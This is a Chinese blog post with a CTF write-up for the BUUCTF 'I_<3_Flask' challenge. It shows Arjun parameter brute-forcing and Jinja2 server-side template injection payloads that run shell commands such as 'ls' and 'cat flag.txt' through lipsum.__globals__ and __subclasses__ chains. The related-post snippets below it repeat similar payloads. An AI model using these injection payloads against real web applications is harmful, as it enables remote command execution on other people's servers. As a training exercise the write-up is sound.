BUUCTF-[RootersCTF2019]I_<3_Flask

已于 2023-07-17 15:30:26 修改
阅读量223 收藏
点赞数
文章标签: flask python 后端
于 2023-07-17 15:21:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49803180/article/details/131767196
版权
题目描述flask框架,寻找一下flask路由,f12没有发现什么东西,看了wp,这里需要用到一个工具是Arjun,可以爆破我们所需要的参数:

下载:GitHub - s0md3v/Arjun: HTTP parameter discovery suite.

pip3 install arjun

python3 setup.py install

输入arjun -h查看版本,出现如下页面则安装成功:

arjun -u http://xxxxxxx.node4.buuoj.cn:81/ -c 100 -d 5

但是呢跑了半天也没出来,可以直接试试name参数。

方法一:

直接利用flask的一个方法:lipsum,在lipsum.__globals__含有os模块,利用方法:{{lipsum.__globals__['os'].popen('ls').read()}}

payload:/?name={{lipsum.__globals__['os'].popen('ls').read()}}

发现了flag.txt,直接用cat命令:

payload:/?name={{lipsum.__globals__['os'].popen('cat flag.txt').read()}}

方法二:

1.直接使用jinjia2模板进行注入测试

?name={{%27%27.__class__.__base__.__subclasses__()}}#查看当前页面下,加载的子类

全部复制出来,放到notepad++中进行查看。

可以查找的子类模块所在位置,编号为132(133-1)

2.?name={{''.__class__.__base__.__subclasses__()[132].__init__}} #查看模块是否被加载

加载成功就可以利用了。

3.?name={{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

4.?name={{%27%27.__class__.__base__.__subclasses__()[132].__init__.__globals__[%27popen%27](%27cat%20flag.txt%27).read()}}

这个方法的详细介绍在青少年CTF-SSTI那篇。

就这样!啾咪 

elmxi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
强大的端口扫描工具! 绝对无毒绿色!
07-13
强大的端口扫描工具! 绝对无毒绿色!快来下载,无毒!
基于变结构控制策略的转台控制技术研究
05-05
本文是硕士学位论文,题目是《基于变结构控制策略的转台控制研究》。
题解([RootersCTF2019]I_3_Flask,[CISCN2019 华东南赛区]Double Secret,[CISCN2019 华东南赛区]Web4)
2202_75361164的博客
11-12 171
抓取/flag,并且将session更改为:eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.ZUjA4g.TDHugXodYeccRQbQmc1SZh9CffA。直接看/flag路由,发现session[‘username’] == 'fuck’时给flag,所以要伪造session,不过我们需要先得到密钥。发现被过滤了,有点不对劲,尝试/index.php发现404,推测为python,尝试。成功,尝试读取/flag,被过滤了。3.读取/app/app.py。
[RootersCTF2019]I_3_Flask 1&arjun爆破参数
plant1234的博客
10-04 1576
根据测试发现有ssti模板注入。
BUUCTF [RootersCTF2019] I_3_Flask
Senimo
12-19 1219
BUUCTF [RootersCTF2019] I_<3_Flask 考点: Jinjia2模版注入 Arjun参数爆破工具 tplmap模版注入工具 启动环境: 一道Flask题目,大概率为模版注入,先用Arjun工具对可利用传参进行爆破: python3 arjun.py -u http://xxx.node3.buuoj.cn/ -m GET -c 200 得到参数名:name 尝试传入值:?name=1 页面发生了变化,传参被成功执行,尝试模版注入: ?name={{2*2}}
[RootersCTF2019]I_3_Flask -不会编程的崽
最新发布
不会编程的崽的博客
03-23 517
参数爆破 简单的jinja&ssti
BUUCTF--[RootersCTF2019]I_3_Flask
qq_46263951的博客
07-15 280
进入页面后发现并没有什么可以利用的地方 利用Arjun扫描可以得到一个参数name 接下来要利用SSTI模板注入 尝试模板注入,发现可以成功执行 ?name={{8*8}} 方法一: 直接可以利用此漏洞执行payload ?name={{lipsum.__globals__.os.popen('cat flag.txt').read()}} 方法二: 使用tplmap,可以得到是存在jinjia2模版注入再进行getshell即可拿到flag 由于我这边...
flask--master_flask_
10-03
7. **扩展**: Flask生态系统中有众多扩展,如Flask-SQLAlchemy用于ORM操作数据库,Flask-Migrate进行数据库迁移,Flask-Login处理用户认证,Flask-Mail发送邮件等。 8. **蓝本(Blueprints)**: 大型应用中,蓝本...
python-flask-microservice_Flask框架_flask_phyton_
09-30
5. **扩展(Extensions)**: Flask的生态系统中有大量扩展,如SQLAlchemy用于ORM,Flask-SocketIO实现WebSocket,Flask-RESTful构建RESTful API等。EasyUI的集成就是扩展的一个例子。 **Flask与微服务** 微服务...
flask-tutorial-2_flask_lotsqi_源码.zip
10-05
Flask框架深度解析——基于flask-tutorial-2_flask_lotsqi_源码》 Flask,作为Python中最受欢迎的轻量级Web服务框架之一,以其简洁、灵活的特性深受开发者喜爱。本教程将深入探讨Flask的核心概念、工作原理以及在...
REST-API-SENSOR_flask_python_
10-03
它提供了核心功能,如路由、请求处理、模板渲染和响应构建,同时允许开发者自由选择其他库进行扩展,如SQLAlchemy(数据库管理)、Flask-SQLAlchemy(简化SQLAlchemy的Flask扩展)、Flask-Restful(用于构建RESTful ...
BUUCTF RootersCTF2019]I_3_Flask
CyhDl666的博客
03-17 300
文章目录手注tplmap 手注 刚进入题目 知道是SSTI注入 但是没找到注入点 学到了一个新的工具 Arjun 扫描到get参数name ?name={{'aaa'.upper()}} 确定是SSTI注入 构造payload: {% for c in [].__class__.__base__.__subclasses__()%}{% if c.__name__== 'Popen' %}{{c.__init__.__globals__['os'].popen('ls').read()}}{% en
[RootersCTF2019]I_3_Flask
m0_62905261的博客
07-23 620
[RootersCTF2019]I_
[RootersCTF2019]I_3_Flask(参数爆破工具arjun)
qq_44657899的博客
08-16 1622
arjun安装 下载地址 s0md3v /Arjun cd Arjun-2.1.4 pip3 install arjun py -3 setup.py install 如果输入arjun -h有如下输出则安装成功 解题 首先使用arjun爆破参数 arjun -u http://aac8b7e4-008f-486a-9642-232db8c62642.node4.buuoj.cn:81/ -c 100 -d 5 参数: -d DELAY Delay between requests in secon
[RootersCTF2019]I_3_Flask --- sql注入新方法:---‘0’+‘0’的奇怪方式来做 --- 二次注入--hex双重编码- 16进制---ascii也可以的
Zero_Adam的博客
04-04 590
一、自己看WP后写脚本 我连注册登陆的脚本都写不好,,,写了半天,最后的那个submit不用管,直接就登陆了,然后每次要换一次 邮箱 和 账号 import requests register_url="http://f22e5570-b535-4c98-9bb4-62b097db515b.node3.buuoj.cn/register.php" login_url="http://f22e5570-b535-4c98-9bb4-62b097db515b.node3.buuoj.cn/login.php"
os模块
qq_45594312的博客
01-11 156
1.概述 os模块提供了多数操作系统的功能接口函数 当os模块被导入后,它会自适应于不同的操作系统平台,根据不同的平台进行相应的操作 在python编程时,经常和文件、目录打交道,所以离不了os模块 2.一些操作 1.返回操作系统类型 程序代码 运行结果 2.操作系统的详细信息 程序代码 运行结果 3.系统的环境边量 程序代码 运行结果 4.判断是否是绝对路径 程序代码 运行结...
[rootersctf2019]i_<3_flask
04-09
不好意思,我是语言模型AI,无法直接回答该问题,但是我可以帮您翻译该问题的意思,该题目应该是一道CTF比赛中的题目,题目名称为"[rootersctf2019]i_<3_flask"。关于具体内容需要参加比赛的选手来解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值